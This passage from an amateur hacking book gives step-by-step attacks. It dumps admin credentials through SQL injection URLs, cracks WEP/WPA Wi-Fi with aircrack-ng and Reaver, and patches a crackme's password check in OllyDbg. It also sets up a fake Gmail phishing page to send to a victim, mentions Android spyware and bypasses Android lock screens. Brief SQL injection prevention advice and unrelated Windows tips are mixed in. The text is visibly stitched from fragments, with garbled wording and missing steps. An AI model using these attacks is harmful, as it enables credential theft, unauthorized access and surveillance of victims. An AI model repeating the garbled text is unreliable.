For eg:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select
1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where
table_name=CHAR(97, 100,
109, 105, 110)
The above query will display the list of column.
For example:
admin,password,admin_id,admin_name,admin_password,active,id
,admin_name,admin_pass,admin_id,admin_name,admin_passwo
rd,ID_admin,admin_usern me,username,password..etc..
Now replace the replace group_concat(column_name) with
group_concat(columnname1,0x3a,anothercolumnname2).
Now replace the from table_name=CHAR(97, 100, table_name
information_schema.columns where
109, 105, 110) with the from
For eg: http://www.anyselectedsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from
adminIf the above query displays the column is not found error, then try another column name
from the list.
If we are lucky, then it will display the data stored in the database depending on your
column name. For example, username and password column will display the login
credentials stored in the database.
Step 7: Finding the Admin Panel:
Just try with url like:
http://www.anyselectedsite.com/admin.php
http://www.anyselectedsite.com/admin/
http://www.anyselectedsite.com/admin.html
http://www.anyselectedsite.com:2082/
etc.
If you are lucky, you will find the admin page using above urls or you can use some kind
of admin finder tools like Havij admin finder, sql poison for SQL attacking (tool).
And once you found the admin panel you have to do further works on your own risk.
PREVENTION:
This article is focused on providing clear, simple, actionable guidance for preventing SQL
Injection flaws in your applications. SQL Injection attacks are unfortunately very
common, and this is due to two factors:
1.) The significant prevalence of SQL Injection vulnerabilities, and
2.) The attractiveness of the target (i.e., the database typically contains all the
interesting/critical data for your application).
Its somewhat shameful that there are so many successful SQL Injection attacks occurring,
because it is EXTREMELY simple to avoid SQL Injection vulnerabilities in your code.
SQL Injection flaws are introduced when software developers create dynamic database
queries that include user supplied input. To avoid SQL injection flaws is simple.
Developers need to either: a) stop writing dynamic queries; and/or b) prevent user
supplied input which contains malicious SQL from affecting the logic of the executed
query.
This article provides a set of simple techniques for preventing SQL Injection
vulnerabilities by avoiding these three problems. These techniques can be used with
practically any kind of programming language with any type of database.
SQL injection flaws typically look like this:
The following (Java) example is UNSAFE, and would allow an attacker to inject code into
the query that would be executed by the database. The invalidatedcustomerName
parameter that issimplyappended to the query allows an attacker to inject any SQL code
they want. Unfortunately, this method for accessing databases is all too common.
String query = SELECT account_balance FROM user_data WHERE user_name =
+ request.getParameter(customerName);
try {
Statement statement = connection.createStatement( ); ResultSet results =
statement.executeQuery( query );
}
PREVENTIONS
Option 1: Prepared Statements (Parameterized Queries):
The use of prepared statements (parameterized queries) is how all developers should first
be taught how to write database queries. They are simple to write, and easier to understand
than dynamic queries. Parameterized queries force the developer to first define all the
SQL code, and then pass in each parameter to the query later. This coding style allows the
database to distinguish between code and data, regardless of what user input is supplied.
Prepared statements ensure that an attacker is not able to change the intent of a query, even
if SQL commands are inserted by an attacker. If an attacker were to enter the user ID or
1=1 , the parameterized query would not be vulnerable.
2. Use dynamic SQL only if absolutely necessary.
Dynamic SQL can almost always be replaced with prepared statements, parameterized
queries, or stored procedures. For instance, instead of dynamic SQL, in Java you can use
PreparedStatement() with bind variables, in .NET you can use parameterized queries, such
as SqlCommand() or OleDbCommand() with bind variables, and in PHP you can use PDO
SQL INJECT ME
TESTING SQL INJECTION BY USING TOOL
One of the easiest tool to test SQL injections is the Firefox extension named SQL Inject
ME. After you install the extension, the tool is available in the right-click context menu, as
well as from Tools Options. The sidebar of SQL Inject ME is shown in the next
screenshot and as you can see there are many tests you can run:
You can choose which tests to run and which values to test. When you press one of the
Test buttons, the selected tests will start. When the tests are done, you will see a report of
how the tests ended.
There are many options you can set for the SQL Inject ME extension, as shown in the next
two pictures:
As you see, there are many steps you can take in order to clean your code from potential
SQL injection vulnerabilities. Dont neglect these simple steps because if you do, you will
compromise the security not only of your sites but also of all the sites that are hosted with
your web hosting provider.
WPA2 TESTING
WI-FI HACKING USING BACKTRACK
After performing the SQL injection, I can bet that now you have the endless curiosity to
explore more about the ethical hacking. And as according to your need now in this article
we are going to perform a hardcore hack using Backtrack Linux. we are going to learn that
how to crack the WI-FI using Backtrack.one more thing I want to add here that all these
stuff I am sharing with you is only for study purpose .if you have the black intentions just
leave the book now. If you are performing this article on your computer, you will be
responsible for any damage occurred by you.
So lets start the article:
Now let us start with the Wi-Fi cracking. But before starting the tutorial let me give you a
small introduction to what Wi-Fi hacking is and what is the security protocols associated
with it.
In a secured wireless connected the data on internet is sent via encrypted packets. These
packets are secured with network keys. There are basically 2 types of security keys:
WEP (Wireless Encryption Protocol):- This is the most basic form of encryption. This has
become an unsafe option as it is vulnerable and can be cracked with relative ease.
Although this is the case many people still use this encryption.
WPA (WI-FI Protected Access) : This is the most secure wireless encryption. Cracking of
such network requires use of a wordlist with common passwords. This is sort of brute
force attack. This is virtually uncrackable if the network is secured with a strong password
So lets begin the actual Wi-Fi Hacking tutorial! In order to crack Wi-Fi password, you
require the following things:
For the Wi-Fi hacking you need to install the Backtrack on your computer.
I am assuming that you have already installed the Backtrack on your pc. If not its very
easy to install by making bootable live CD/DVD. For installing processes you can just
Google it. You will get it easily.
Now open the console from the taskbar, Click on the icon against the dragon like icon in
the taskbar in the above screenshot.
You will have a Command Prompt like Shell called as console terminal.
1) Lets start by putting our wireless adapter in monitor mode. It allows us to see all of the
wireless traffic that passes by us in the air. Type airmon-ng in the console terminal and
press Enter. You will have a screen like this, note down the name of interface, in this case
the name is wlan0.
The above command in the console has started your network adapter in monitor mode as
mon0:
4) Now that our wireless adapter is in monitor mode, we have the capability to see all the
wireless traffic that passes by in the air. We can grab that traffic by simply using the
airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical
information about it, including the BSSID (the MAC address of the AP), power, number
of beacon frames, number of data frames, channel, speed, encryption (if any), and finally,
the ESSID (what most of us refer to as the SSID).
Lets do this by typing:
airodump-ng mon0
In the above screenshot there is a list of available networks, Choose 1 network and note
the BSSID and channel of it.
5.) Type airodump-ng -c channel no bssid BSSIDN1 mon0 -w filename and hit enter.
Replace channel no. and BSSIDN1 with the data from step 4. Replace the mon0 with
network interface name from step 3. In place of filename write any name and do
remember that. Better use filename itself.
This command will begin capturing the packets from the network. You need to capture
more and more packets in order to crack the Wi-Fi password. This packet capturing is a
slow process.
6.) To make the packet capturing faster, we will use another command. Open a new shell,
dont close the previous shell. In new shell type aireplay-ng -1 0 -a BSSIDN1 -h
00:11:22:33:44:55 mon0 and hit enter.
Replace the BSSIDN1 with the data from step 4 and mon0 from step 3. This command
will boost the data capturing process.
The -1 tells the program the specific attack we wish to use which in this case is fake
authentication with the access point. The 0 cites the delay between attacks, -a is the MAC
address of the target access point, -h is your wireless adapters MAC address and the
command ends with your wireless adapters device name.
7.) Now wait for few minutes, let the DATA in the other console reach a count of 5000.
8.) After it reaches 5000, open another console and type aircrack-ng filename-01.cap and
hit enter.
Replace the filename with the name you used in step 5. Add -01.cap to it. .cap is the
extension of file having captured data packets. After typing this command, aircrack will
start trying to crack the Wi-Fi password. If the encryption used is WEP, it will surely crack
the password within few minutes.
In case of WPA use the following command instead of the above aircrack-ng -w
/pentest/wireless/aircrack-ng/test/password.lst -b BSSIDN1 filename-01.cap
Replace BSSIDN1 and filename with data you used. /pentest/wireless/aircrackng/test/password.lst is the address of a file having wordlist of popular passwords. In case
of WPA aircrack will try to brute force the password. As I explained above that to crack
WPA you need a file having passwords to crack the encryption. If you are lucky enough
and the network owner is not smart enough, you will get the password.
PREVENTION:
For the prevention from being hacked you can refer to the chapter
PASSWORD CREATING POLICIES.
App.
It will ask you to enter the password, enter any password you want and hit on OK.
Now
it will show you the error that You are not authorized to use the application.
Now open the OllyDBG and open the Crack me app in it.
When you have opened the Crack me app in OllyDBG,now in the upper left box, while
scrolling up you find the statement like this: JE SHORT Password.00457728
Basically, this is a conditional jump that means if the condition is true then it will jump to
00457728 Which shows us the message You are not authorized to use the application
and if the condition is not true it just continues reading the code, So we dont need this
jump to work as we dont want to get the error message.
Now for removing the error message, we can change JE SHORT Password.00457728 to
JNE SHORT Password.00457728, JNE(Jump If Not Equal) means that if the password is
correct it will give you the error message and if the password is incorrect it will give you
the correct message.
For changing the query just double click the line JE SHORT Password.00457728 and
simply change it to JNE SHORT Password.00457728 and Hit on Assemble.
Now HIT on blue PLAY button in the upper side of the OllyDBG to start the Crack me
app again and enter the password then it will give you the correct message.
www.my3gb.com
step2: Now upload all the three files you have downloaded.(I have taken
www.my3gb.com)
step 3: Give the link of the fake page to your victim.
eg: www.yoursitename.my3gb.com/Gmail.html
Step 4: when he clicks the link, it opens a fake Gmail page where he enters his login
details. When he clicks sign in button, his login
details will be stored in log.txt file.
Demonstration:
Here I have uploaded my scripts on to
www.my3gb.com
And copy the Gmail.html link which you have to send the victim. i clicked the Gmail.html
link
A fake page was opened where i entered my login details.
This page will looks exactly similar to the original Gmail login page. And when the victim
enters his/her login details for logging in into his/her account.
Now, this time the victim will redirected to the original Gmail login website.
The victim will even dont know that his/her account got hacked. Victim will think that the
page gets reloaded due to internet errors or login mistakes etc.
Now his/her login details were captured by the php script and stored in log.txt file as
shown in the figure below:
USB SECURITY
Securing Pen Drives From Malicious Viruses
Today, a giant downside for windows user is to secure their data from viruses. Especially,
in Pen drives, nobody needs to keep their vital data in pen drives as a result of pen drives
square measure transportable devices and through sharing data it may get infected by virus
like shortcut virus, Autorun.inf , and new folder virus etc. Some folks recover their data by
merely using Command prompt however some folks assume theres solely possibility left
and it is to format the pen drive.
So, if your pendrive is infected by any of those virus you can merely follow these step to
induce your hidden data back.
Open CMD (command prompt)
Open Flash drive in CMD ( if your drive is G than enter G: after c:\user\ press
[ENTER] )
Now type following command and hit enter:
attrib -s -h /s /d
Now open your pen drive in windows you may see all of your files . However wait ! is it
enough ? No way! your pen drive is still not totally secure . Higher than command simply
shows all of your files that square measure hidden by viruses. If you want to shield your
USB from obtaining unwanted files i.e. virus, worm, spy, Trojan etc. then you need to
follow these steps.
What Im going to tell you is tha t a way to setup your registry to finish a computer from
saving files to your USB. If you have windows seven or windows eight then youll
immobilize the writing choice to USB drives. This trick is incredibly useful if you have
virus in your laptop and want to repeat files from a USB Drive however also dont want to
transfer virus to the USB. Follow the given steps to disable the USB writing option:
Open notepad and replica and paste the following:
Windows registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageD evicePolicies]
WriteProtect=dword:00000001
Now keep the file with the extension .reg.
Click on the file you now saved. within the pop-up window selected affirmative and then
OK.
Thats it your USB is currently secure
TURNING THE SECURITY OFF
To just off this security measure
Open notepad and copy and paste the following:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageD evicePolicies]
WriteProtect=dword:00000000
Now overlo oked the file with the extension .reg. Click on the file you currently saved.
within the pop-up window click affirmative and then OK. Thats it your defense is
currently disabled.
PDF SECURITY
HOW TO PROTECT YOUR PDF FILES FROM COPYING
Now these days its a big deal to secure your PDF documents. In this article I will show
you that HOW TO PROTECT YOUR PDF FILES FROM BEING COPIED FOR
PIRATION AND OTHER MALITIOUS INTENTIONS.
For protecting your PDF files you can use a tool A-PDF password security to protect a
PDF file. You can set password and prevent people from copy and paste PDF contents,
here is an easy tutorial to make you aware about the use of that tool.
Install the A-PDF password security.
Launch the program and open the password protect wizard.
select the option single pdf document security and push the button next>
Click browse button to open a pdf file will be encrypted, select the security level and
encryption method. You can setup password for opening and modification of your
document.
Click save or save as to set a document open password and disallow copying
permission.
After saving the file you will choose to open saved PDF file with the default PDF viewer,
set another PDF file security or open destination folder in windows explorer.
NOTIFY ME
SENDING A MESSAGE TO OTHER USER IN YOUR PC
In this article we are going to learn that how to send any message to the other user account
associated with your own pc.
Lets assume if you want to leave any message for your brother and sister who have user
accounts associated with the same pc in which you have also a user account.
So follow these steps to pass any message which you to another user account at his next
login.
Open the task manager of your pc by clicking CTRL+ALT+DEL keys simultaneously.
Then click on user option to view the available user account associated with your pc.
Select any another user account which you want to pass the message.
Then click on the send message option place in the lower right corner.
When it asks to rename the folder just click ALT key and by keep pressing the ALT key
press 2, 5, 5 one by one.
And then enter.
You will find that there it creates a folder without having any name.
By using this tool you can easily keep tracking the victims android phone.
I am showing you the screen shots of those things which we can spy from an android
phonesuch as CALL HISTORY, WHATSAPP MESSAGES, and SMS DETAILS etc.
list is shown below in the screenshot.
Then add a new server, select automatic and the app will find your computer.
Tap your computers name to connect.
Now you are ready to start controlling your computer with phone.
Tap remote in the app.
The Basic input remote will prompt the mouse, which you can use as a track pad.
Instructions for using the mouse will appear on screen.
Also there are lot of options are available by which you can control your computer in
different ways.
Example: - keyboard controlling, file manager, media, power, start, YouTube etc.
And you will see that the icon of that folder will be changed and when you will open it
you will find all the settings arranged in well manner in it.
CRACKING LOCKSCREEN
HOW TO CRACK ANDROID LOCK SCREEN
In this article we are going to learn that how to bypass the android lock screen.
We are going to bypass the lock screen using a tool name as Aroma File manager.
This is the best method for crack android pattern lock; you must have custom recovery
installed on your device in order to use this method. Lets start the cracking android lock
screen.
First of all download Aroma File manager zip file. Google it and you will find it easily.
Now copy this Aroma file manager zip to root of your SD card. After copying zip file to
SD, boot your phone into Recovery mode (Each phone has different key combination to
boot up in recovery mode, you can search it on Google).
In recovery choose install zip from SD card or apply update from SD card, now select
Aroma.zip which you have downloaded earlier.
After installing or updating Aroma file manager will open, use volume up and down keys
for Scrolling as you do in recovery.
In Aroma file manager go to menu which is located at bottom strip after clicking menu
select settings. Go to bottom in settings and then select mount all partitions in startup
after mounting exit Aroma file manager.
Now launch Aroma file manager again.
In aroma Go to Data>>System.
You will find Gesture.key if you have applied gesture lock or Password.key if you
have applied password.
Long press Gesture.key or Password.key which one is available, after long pressing it
will prompt some option, choose delete and delete that file and restart your device(first
exit from aroma file manager then restart your phone).
Yuppie! Your phone is unlocked now. After rebooting it will ask you for lock pattern
dont worry now you can use any pattern, your old pattern has gone away.
REAVER BACKTRACK
WI-FI CRACKING USING REAVER IN BACKTRACK
Well, in this article I will show you that how to crack WPA2-PSK key using a tool names
as REAVER. Reaver use to crack the key by brute force method.
Lets see how to crack the key using Backtrack.
Now I am using Backtrack 5r3.
So open the console and follow the given steps:
First thing is to do is run the command :
Airmon-ng start wlan0
Now you have to wait, time taken is dependent on the strength of password and the speed
of your internet connection,
And finally after brute forcing it will give you the WPA2 pin.
WINDOWS SHORTCUTS
SOME USEFUL WINDOWS SHORTCUTS
1. Windows Key + Tab: Aero
2. Windows Key + E: Launches Windows Explorer
3. Windows Key + R: Run Command box
4. Windows Key + F: Search
5. Windows Key + X: Mobility Center
6. Windows Key + L: Lock Computer
7. Windows Key + U: Ease of Access box
8. Windows Key + P: Projector
9. Windows Key + T: Cycle Super Taskbar Items
10. Windows Key + S: OneNote Screen Clipping Tool
11. Windows Key + M: Minimize All Windows
12. Windows Key + D: Show/Hide Desktop
13. Windows Key + Up: Maximize Current Window
14. Windows Key + Down: Restore Down / Minimize
15. Windows Key + Left: Tile Current Window to the Left
16. Windows Key + Right: Tile Current Windows Right
17. Windows Key + # (any number)
18. Windows Key + =: Magnifier
19. Windows Key + plus: Zoom in
20. Windows Key + Minus: Zooms out
21. Windows Key + Space: Peek at the desktop
DATA FORENSICS
HOW TO RECOVER PERMANENTLY DELETED FILES
In this article we will learn that how to recover our permanently deleted files from our
computer. Sometimes your important data is accidently deleted from your computer as
well as from recycle bin also, and its very important to recover that file or data.
So here I am using a tool name as stellar phonix windows data recovery to recover the
permanently deleted files.
By using this tool you can recover your accidently deleted data from your computer.
For it you have to follow simple steps as mentioned below:
Click on the option deleted file recovery or folder recovery according to your choice.
Then choose the local drive from where you want to scan for the deleted files/folder.
Then it asks you for a quick scan or deep scan, you can choose as according to your need.
After that it scans for all the deleted files/folder from your particular selected local drive.
And show you the list of the entire folder from which files are deleted.
Then you have to select your deleted file/folder which you want to recover, as I have
selected here hacking tools from the folder vi.
And then click on the recover option to recover your data successfully.
Note: - The recovered data will work only when the address of that location is
empty/not overwritten from where that file/folder is deleted accidently.
CONCLUSION:
Thanks For reading this book and I hope the contents described in this book will help you
to know the intents of hackers. Now you are capable of securing your own and your
surrounding computers, mobile phones and other networks from the Threat we called
HACKINGAn art of exploitation.
BIBLIOGRAPHY
THEBIGCOMPUTING.COM Hacking for dummies Hacking exposed
XDA developers
Etc.
Find out more @
THEBIGCOMPUTINGdotCOM
HACK-X-CRYPT
204